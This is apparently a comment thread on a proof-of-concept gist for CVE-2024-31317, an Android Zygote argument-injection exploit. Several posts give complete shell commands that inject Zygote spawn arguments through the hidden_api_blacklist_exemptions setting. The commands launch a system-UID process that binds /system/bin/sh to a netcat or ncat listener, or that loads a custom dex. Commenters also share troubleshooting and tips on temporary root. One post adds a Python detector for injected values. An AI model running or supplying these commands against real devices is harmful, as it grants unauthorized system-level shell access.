```sh
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234
```
Interesting. I didn't think it would be able to execute from the tmp folder. By the way, the su part doesn't matter; that was just left over from my testing.
Yeah, unfortunately my toybox was built with no nc. Do you know what I need to look at in the log in case of failure/success? And I suppose you're executing those commands in the shell simultaneously via an sh script, or separately one by one?
I didn't bother with a script since I have Android 10. You would see zygote errors in logcat and/or SELinux denials in dmesg.
Tried to reproduce on my Honor device - no luck... Had to use ncat instead, like this:
```sh
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
/data/local/tmp/ncat -l -e /system/bin/sh 127.0.0.1 1234;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
am start -a android.settings.SETTINGS
nc localhost 1234
```
Which ncat are you using?
@ybtag thanks for sharing this. It works, but I was trying to run a service using this exploit which would have some method to perform privileged functions and then return the response. This service could then be called by a custom non-privileged application during runtime to achieve privileged function calls and show the result on the UI. Were you able to achieve this or anything similar?
I've also managed to make this exploit work on Android 11 and 10.
Is there any possibility to use this exploit to temporarily root a device? And also, what directories are safe to place bin/executables in, since /data/local/tmp is inaccessible?
@Bonveio were you able to achieve something like this: https://gist.github.com/ybtag/db3f3595139556c773fb94b7cbe668b5?permalink_comment_id=5535933#gistcomment-5535933?
From what I understand of the PoC, it's impossible to initialize the exploit without UID 2000 (the shell user), which you can only achieve externally using adb (if the device is not rooted; if it is rooted, I think you can run adbd in a superuser shell). But the running netcat shell server with UID 1000 privileges listening on 0.0.0.0 is accessible to any Android app on the device, like Termux. Just be careful to remove the hidden_api_blacklist_exemptions before rebooting/restarting the device, or else the device will end up in a bootloop.
@Bonveio yes, we have to execute this exploit with shell access (UID 2000), and there are ways that I'm aware of to achieve that. My main question is that even if I run this netcat with system privileges, I am not able to utilize its benefits, such as calling privileged methods during runtime etc., via my custom application. I think there are ways to get back-and-forth communication using this exploit, but I am not able to figure it out.
This is way beyond my knowledge, I'm sorry. I might not be able to help you with that matter, but I'm happy to test the custom application you're trying to build so I can report or suggest something that might be helpful for your development.
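A defender-side check for the cleanup point above, added here as an example and not part of the gist or any comment in this thread: it audits the string returned by `settings get global hidden_api_blacklist_exemptions` for the injected shape seen in the commands earlier on this page (embedded newlines, a Zygote argument count followed by `--runtime-args`, and spawn flags such as `--setuid=` and `--invoke-with`). Both sample values are constructed, and the flag list is an assumption drawn from the arguments used on this page.

```python
import re

# Constructed benign value: comma-separated method signatures on ONE line,
# the only shape a legitimate exemptions list ever has (no newlines).
BENIGN_SAMPLE = "Lcom/example/Foo;->bar()V,Lcom/example/Foo;->baz(I)Z"

# Constructed abused value (shape mirrors the commands in this thread): a
# signature fragment, an embedded newline, then a Zygote argc line and args.
# The wrapper command line is a placeholder, not a real payload.
INJECTED_SAMPLE = (
    "LClass1;->method1(\n15\n--runtime-args\n--setuid=1000\n--setgid=1000\n"
    "--runtime-flags=2049\n--nice-name=runnetcat\n"
    "--seinfo=platform:su:targetSdkVersion=29:complete\n--invoke-with\n"
    "<wrapper command placeholder>\n--package-name=com.android.settings\n"
    "android.app.ActivityThread\n"
)

# Zygote spawn arguments that have no business inside a settings value
# (assumed list, taken from the flags that appear on this page).
DANGEROUS_ARGS = ("--setuid=", "--setgid=", "--setgroups=", "--seinfo=",
                  "--invoke-with", "--nice-name=", "--package-name=")


def audit_exemptions(value):
    """Return a list of findings for a hidden_api_blacklist_exemptions value.

    An empty list means the value looks like an ordinary exemptions list.
    """
    findings = []
    if value is None or value.strip() in ("", "null"):
        return findings                      # unset: nothing to report
    if "\n" not in value:
        return findings                      # single line: normal shape
    lines = value.split("\n")
    findings.append("embedded newline(s): %d extra line(s)" % (len(lines) - 1))
    # Zygote's socket protocol is "<argc>\n--runtime-args\n...", so a bare
    # integer line immediately followed by --runtime-args is the smoking gun.
    for i in range(len(lines) - 1):
        if re.fullmatch(r"\d+", lines[i]) and lines[i + 1] == "--runtime-args":
            findings.append("zygote argument block (argc=%s)" % lines[i])
            break
    for line in lines:
        if line.startswith(DANGEROUS_ARGS):
            findings.append("zygote flag: " + line)
    return findings


def is_injected(value):
    """True when the value carries an injected Zygote command."""
    return bool(audit_exemptions(value))
```

If findings come back, clearing the setting with `settings delete global hidden_api_blacklist_exemptions` before any reboot avoids the bootloop the comment above warns about.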
For example, if I do something like this:
```sh
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
```
Then the Settings app crashes on opening, and the command `am start-foreground-service -n com.user.helloworld/.PrivilegedService;` present in --invoke-with doesn't get invoked properly.
Following this - https://blog.flanker017.me/cve-2024-31317/ - I tried to do something like this:
```sh
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"
```
But it is throwing an "Already cached" exception:
```
java.lang.IllegalStateException: Already cached.
    at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148)
    at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374)
    at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144)
    at com.android.internal.os.WrapperInit.main(WrapperInit.java:83)
    at java.lang.reflect.Method.invoke(Native Method)
    at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
```
For anyone wondering, this is what I had to do on my Honor 10 (COL-L29): https://nmexis.me/blog/honor-10-backup.html
Its toybox does not come with netcat and @rabits's approach did not work for me because the system user cannot access the /data/local/tmp folder. So, I needed to improvise a bit by uploading my own netcat or toybox executable (both actually work fine) and using a "reverse" procedure where the system user does not open the socket at all, but rather it connects to a socket that I need to open from the outside using the custom netcat setup. May be useful for someone in the future, maybe
Thank you @ThexXTURBOXx for the update! Checked on my still-the-same VER-N49 (Android 13, 7.2.0.108(C636E1R2P2)) - and no luck... In the meantime I tried some different approaches (like the GPU exploit from Quest 3) - but still nothing... This is surely a tough nut to crack.
@rabits I also tried out the same GPU exploit on my Honor 10, but didn't get anywhere, sadly. But it's good to know that your Honor phone is on Android 13, as this needs some additional setup, as seen here:
https://github.com/ThexXTURBOXx/CVE-2024-31317/blob/main/31317/app/src/main/java/com/fh/exp31317/MainActivity.java#L230-L241
I am guessing that my code is already rather correct also for your device, but the padding does not have the correct length(s). Feel free to experiment with that a bit, of course, and let me know if you find some padding lengths that work!
When trying out a few length combinations, keep an eye on the logcat output. Especially when it says something like "Broken pipe", you need to act upon it. I just rebooted the entire device in this case. It may be enough to force-stop the exploit app and restart it, but I am not 100% certain and have not tried it.
I also encountered other errors that seemed rather odd and were non-deterministic for some reason. Most of them can be ignored, but maybe they do actually carry some important info that you can (ab)use to your benefit (by comparing with the Zygote source code).